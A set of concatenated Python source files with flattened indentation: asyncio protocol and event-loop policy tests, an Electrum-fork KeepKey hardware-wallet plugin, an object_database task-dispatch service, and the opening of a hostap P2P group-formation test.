NotImplementedError, loop.set_debug, f)
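# The protocol base classes provide default no-op callbacks that simply
# return None.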
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
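# Event loop policy tests: DefaultEventLoopPolicy behaviour and the global
# get/set_event_loop_policy() accessors.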
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
if __name__ == '__main__':
unittest.main()
# ===== keepkey.py =====
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_pac.util import bfh, bh2u, UserCancelled
from electrum_pac.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum_pac import constants
from electrum_pac.i18n import _
from electrum_pac.plugin import BasePlugin
from electrum_pac.transaction import deserialize, Transaction
from electrum_pac.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_pac.wallet import Standard_Wallet
from electrum_pac.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d" % sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
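# Gather each input's previous transaction and the xpub derivation paths
# this keystore controls, then hand off to the plugin for device signing.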
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "PacTestnet" if constants.net.TESTNET else "Pac"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
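# Convert Electrum transaction inputs into KeepKey TxInputType messages,
# handling both single-signature and multisig inputs.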
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
if len(xpubs) == 1:
script_type = self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from the user,
                # because no more than one change address is allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
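    # self.prev_tx (populated in sign_transaction) maps txid -> Electrum transaction;
    # the device library calls back into get_tx() to fetch previous transactions,
    # e.g. so it can verify the amounts of the inputs being signed.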
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
Task.py
|
# Copyright 2019 Braxton Mckee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import traceback
import threading
import time
from object_database.web import cells as cells
from object_database.service_manager.ServiceSchema import service_schema
from object_database.service_manager.ServiceBase import ServiceBase
from object_database import Schema, Indexed, Index, core_schema
from object_database.view import revisionConflictRetry, DisconnectedException
from typed_python import OneOf, Alternative, ConstDict
task_schema = Schema("core.task")
# how many times our worker can disconnect in a row before we get marked 'Failed'
MAX_TIMES_FAILED = 10
@task_schema.define
class ResourceScope:
pass
class TaskContext(object):
"""Placeholder for information about the current running task environment passed into tasks."""
def __init__(self, db, storageRoot, codebase):
self.db = db
self.storageRoot = storageRoot
self.codebase = codebase
class RunningTask(object):
"""Base class for a running Task's state. This must be serializable."""
def __init__(self):
pass
def execute(self, taskContext, subtaskResults):
"""Step the task forward. Should return a TaskStatusResult. If we asked for results, they are passed back in subtaskResults"""
raise NotImplementedError()
class TaskExecutor(object):
"""Base class for all Tasks. """
def instantiate(self):
"""Return a RunningTask that represents us."""
raise NotImplementedError()
class RunningFunctionTask(RunningTask):
def __init__(self, f):
self.f = f
def execute(self, taskContext, subtaskResults):
return TaskStatusResult.Finished(result=self.f(taskContext.db))
class FunctionTask(TaskExecutor):
"""A simple task that just runs a single function."""
def __init__(self, f):
self.f = f
def instantiate(self):
return RunningFunctionTask(self.f)
TaskStatusResult = Alternative(
'TaskStatusResult',
Finished={'result': object},
Subtasks={'subtasks': ConstDict(str, TaskExecutor)},
SleepUntil={'wakeup_timestamp': float}
)
TaskResult = Alternative(
"TaskResult",
Result={'result': object},
Error={'error': str},
Failure={}
)
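# Illustrative sketch (not part of the original schema): a TaskExecutor that fans work
# out into FunctionTask subtasks and aggregates their results, using the two-step
# execute() contract and the TaskStatusResult/TaskResult alternatives defined above.
# The names "SumExecutor"/"RunningSum" and the doubling lambda are hypothetical.
class RunningSum(RunningTask):
    def __init__(self, values):
        self.values = values
    def execute(self, taskContext, subtaskResults):
        if subtaskResults is None:
            # first call: ask the framework to run one FunctionTask per value
            return TaskStatusResult.Subtasks(subtasks={
                str(i): FunctionTask(lambda db, v=v: v * 2) for i, v in enumerate(self.values)
            })
        # second call: subtaskResults maps subtask name -> TaskResult (this assumes every
        # subtask finished successfully with TaskResult.Result)
        return TaskStatusResult.Finished(result=sum(r.result for r in subtaskResults.values()))
class SumExecutor(TaskExecutor):
    """Example executor; a caller could schedule it with Task.Create(service, SumExecutor([1, 2, 3]))."""
    def __init__(self, values):
        self.values = values
    def instantiate(self):
        return RunningSum(self.values)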
@task_schema.define
class Task:
service = Indexed(service_schema.Service)
service_and_finished = Index('service', 'finished')
resourceScope = Indexed(OneOf(None, ResourceScope))
executor = TaskExecutor
parent = OneOf(None, task_schema.Task)
instance = OneOf(None, object)
time_elapsed = float
result = OneOf(None, TaskResult)
finished = Indexed(OneOf(None, True))
finished_timestamp = OneOf(None, float)
@staticmethod
def Create(service, executor):
return TaskStatus(
task=Task(
service=service,
executor=executor
),
state="Unassigned"
).task
@task_schema.define
class TaskStatus:
task = Indexed(Task)
parentStatus = OneOf(None, task_schema.TaskStatus)
resourceScope = Indexed(OneOf(None, ResourceScope))
state = Indexed(OneOf("Unassigned", "Assigned", "Working", "Sleeping", "WaitForSubtasks", "DoneCalculating", "Collected"))
wakeup_timestamp = OneOf(None, float)
subtasks = OneOf(None, ConstDict(str, task_schema.TaskStatus))
subtasks_completed = int
times_failed = int
worker = Indexed(OneOf(None, task_schema.TaskWorker))
@revisionConflictRetry
def finish(self, db, result, elapsed=0.0):
with db.transaction():
self._finish(result, elapsed)
def _finish(self, result, elapsed=0.0):
self.task.result = result
self.task.time_elapsed += elapsed
self.worker = None
self.state = "DoneCalculating"
@task_schema.define
class TaskWorker:
connection = Indexed(core_schema.Connection)
hasTask = Indexed(bool)
class TaskService(ServiceBase):
coresUsed = 1
gbRamUsed = 8
def initialize(self):
self.db.subscribeToNone(TaskWorker)
self.logger = logging.getLogger(__name__)
with self.db.transaction():
self.workerObject = TaskWorker(connection=self.db.connectionObject, hasTask=False)
self.db.subscribeToIndex(task_schema.TaskStatus, worker=self.workerObject)
def doWork(self, shouldStop):
while not shouldStop.is_set():
with self.db.view():
tasks = TaskStatus.lookupAll(worker=self.workerObject)
if not tasks:
time.sleep(.01)
else:
if len(tasks) > 1:
raise Exception("Expected only one task to be allocated to us.")
self.doTask(tasks[0])
with self.db.transaction():
self.workerObject.hasTask = False
@staticmethod
def serviceDisplay(serviceObject, instance=None, objType=None, queryArgs=None):
cells.ensureSubscribedType(TaskStatus, lazy=True)
return cells.Card(
cells.Subscribed(lambda: cells.Text("Total Tasks: %s" % len(TaskStatus.lookupAll()))) +
cells.Subscribed(lambda: cells.Text("Working Tasks: %s" % len(TaskStatus.lookupAll(state='Working')))) +
cells.Subscribed(lambda: cells.Text("WaitingForSubtasks Tasks: %s" % len(TaskStatus.lookupAll(state='WaitForSubtasks')))) +
cells.Subscribed(lambda: cells.Text("Unassigned Tasks: %s" % len(TaskStatus.lookupAll(state='Unassigned'))))
)
def doTask(self, taskStatus):
with self.db.view():
task = taskStatus.task
self.db.subscribeToObject(task)
t0 = None
try:
with self.db.transaction():
assert taskStatus.state == "Assigned", taskStatus.state
taskStatus.state = "Working"
task = taskStatus.task
codebase = taskStatus.task.service.codebase
subtaskStatuses = taskStatus.subtasks
taskStatus.subtasks = {}
taskStatus.wakeup_timestamp = None
typedPythonCodebase = codebase.instantiate()
self.db.setSerializationContext(typedPythonCodebase.serializationContext)
if subtaskStatuses:
self.db.subscribeToObjects(list(subtaskStatuses.values()))
with self.db.view():
subtasks = {name: status.task for name, status in subtaskStatuses.items()}
self.db.subscribeToObjects(list(subtasks.values()))
with self.db.transaction():
for r in subtaskStatuses.values():
assert r.state == "Collected"
subtask_results = {name: t.result for name, t in subtasks.items()}
for t in subtasks.values():
t.delete()
for s in subtaskStatuses.values():
logging.info("Deleting subtask status %s", s)
s.delete()
else:
subtask_results = None
with self.db.transaction():
executor = taskStatus.task.executor
instanceState = taskStatus.task.instance
if instanceState is None:
instanceState = executor.instantiate()
t0 = time.time()
context = TaskContext(self.db, self.runtimeConfig.serviceTemporaryStorageRoot, codebase)
execResult = instanceState.execute(context, subtask_results)
logging.info("Executed task %s with state %s producing result %s", task, instanceState, execResult)
assert isinstance(execResult, TaskStatusResult), execResult
if execResult.matches.Finished:
taskStatus.finish(self.db, TaskResult.Result(result=execResult.result), time.time() - t0)
if execResult.matches.Subtasks:
with self.db.transaction():
taskStatus.state = "WaitForSubtasks"
taskStatus.worker = None
# create the new child tasks
newTaskStatuses = {}
for taskName, subtaskExecutor in execResult.subtasks.items():
newTaskStatuses[taskName] = TaskStatus(
task=Task(
service=task.service,
resourceScope=task.resourceScope,
executor=subtaskExecutor,
parent=task
),
parentStatus=taskStatus,
resourceScope=task.resourceScope,
state="Unassigned",
worker=None
)
logging.info("Subtask %s depends on %s", task, [str(ts.task) + "/" + str(ts) for ts in newTaskStatuses.values()])
taskStatus.subtasks = newTaskStatuses
if execResult.matches.SleepUntil:
with self.db.transaction():
taskStatus.state = "Sleeping"
taskStatus.worker = None
taskStatus.wakeup_timestamp = execResult.wakeup_timestamp
except Exception:
self.logger.error("Task %s failed with exception:\n%s", task, traceback.format_exc())
taskStatus.finish(self.db, TaskResult.Error(error=traceback.format_exc()), time.time() - t0 if t0 is not None else 0.0)
class TaskDispatchService(ServiceBase):
coresUsed = 1
gbRamUsed = 4
def initialize(self):
self.logger = logging.getLogger(__name__)
self.db.subscribeToType(task_schema.TaskStatus)
self.db.subscribeToType(task_schema.TaskWorker)
def checkForDeadWorkers(self):
toDelete = []
with self.db.view():
for w in TaskWorker.lookupAll():
if not w.connection.exists():
toDelete.append(w)
@revisionConflictRetry
def deleteWorker(w):
while True:
with self.db.view():
taskStatuses = TaskStatus.lookupAll(worker=w)
tasks = [ts.task for ts in taskStatuses]
if not taskStatuses:
return
self.db.subscribeToObjects(tasks)
with self.db.transaction():
for taskStatus in taskStatuses:
taskStatus.times_failed += 1
if taskStatus.times_failed > MAX_TIMES_FAILED:
taskStatus._finish(TaskResult.Failure(), 0.0)
else:
taskStatus.state = "Unassigned"
taskStatus.worker = None
for d in toDelete:
deleteWorker(d)
def doWork(self, shouldStop):
def checkForDeadWorkersLoop():
while not shouldStop.is_set():
try:
self.checkForDeadWorkers()
time.sleep(5.0)
except DisconnectedException:
return
except Exception:
self.logger.error("Unexpected exception in TaskDispatchService: %s", traceback.format_exc())
def assignLoop():
while not shouldStop.is_set():
try:
if self.assignWork():
shouldStop.wait(timeout=.01)
except DisconnectedException:
return
except Exception:
self.logger.error("Unexpected exception in TaskDispatchService: %s", traceback.format_exc())
def collectLoop():
while not shouldStop.is_set():
try:
if self.collectResults():
shouldStop.wait(timeout=.01)
except DisconnectedException:
return
except Exception:
self.logger.error("Unexpected exception in TaskDispatchService: %s", traceback.format_exc())
threads = [threading.Thread(target=t) for t in [checkForDeadWorkersLoop, assignLoop, collectLoop]]
for t in threads:
t.start()
for t in threads:
t.join()
@revisionConflictRetry
def assignWork(self):
count = 0
with self.db.view():
workers = list(TaskWorker.lookupAll(hasTask=False))
tasks = list(TaskStatus.lookupAll(state='Unassigned'))
with self.db.transaction():
while workers and tasks:
worker = workers.pop(0)
task = tasks.pop(0)
worker.hasTask = True
task.worker = worker
task.state = "Assigned"
count += 1
return count
def collectResults(self, maxPerTransaction=30):
count = 0
with self.db.view():
statuses = list(TaskStatus.lookupAll(state="DoneCalculating"))[:maxPerTransaction]
        while count < maxPerTransaction and statuses:
self.collectTask(statuses.pop(0))
count += 1
return count
@revisionConflictRetry
def collectTask(self, taskStatus):
with self.db.view():
task = taskStatus.task
state = taskStatus.state
parentStatus = taskStatus.parentStatus
if state == "DoneCalculating" and parentStatus is None:
self.db.subscribeToObject(task)
with self.db.transaction():
# this is a root-level task. Mark it complete so it can be collected
# by whoever kicked it off.
task.finished = True
task.finished_timestamp = time.time()
logging.info("deleting root status %s", taskStatus)
taskStatus.delete()
elif state == "DoneCalculating":
with self.db.transaction():
parentStatus.subtasks_completed = parentStatus.subtasks_completed + 1
if len(parentStatus.subtasks) == parentStatus.subtasks_completed:
parentStatus.state = "Unassigned"
parentStatus.times_failed = 0
taskStatus.state = "Collected"
|
test_p2p_grpform.py
|
# P2P group formation test cases
# Copyright (c) 2013-2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import time
import threading
import Queue
import os
import hostapd
import hwsim_utils
import utils
def check_grpform_results(i_res, r_res):
if i_res['result'] != 'success' or r_res['result'] != 'success':
raise Exception("Failed group formation")
if i_res['ssid'] != r_res['ssid']:
raise Exception("SSID mismatch")
if i_res['freq'] != r_res['freq']:
raise Exception("freq mismatch")
if 'go_neg_freq' in r_res and i_res['go_neg_freq'] != r_res['go_neg_freq']:
raise Exception("go_neg_freq mismatch")
if i_res['freq'] != i_res['go_neg_freq']:
raise Exception("freq/go_neg_freq mismatch")
if i_res['role'] != i_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if 'go_neg_role' in r_res and r_res['role'] != r_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if i_res['go_dev_addr'] != r_res['go_dev_addr']:
raise Exception("GO Device Address mismatch")
def go_neg_init(i_dev, r_dev, pin, i_method, i_intent, res):
logger.debug("Initiate GO Negotiation from i_dev")
try:
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent)
logger.debug("i_res: " + str(i_res))
except Exception, e:
i_res = None
logger.info("go_neg_init thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pin(i_dev, r_dev, i_intent=None, r_intent=None, i_method='enter', r_method='display'):
r_dev.p2p_listen()
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init, args=(i_dev, r_dev, pin, i_method, i_intent, res))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, timeout=20)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def go_neg_pin_authorized(i_dev, r_dev, i_intent=None, r_intent=None, expect_failure=False, i_go_neg_status=None, i_method='enter', r_method='display', test_data=True, i_freq=None, r_freq=None):
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, freq=r_freq)
r_dev.p2p_listen()
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent, expect_failure=expect_failure, freq=i_freq)
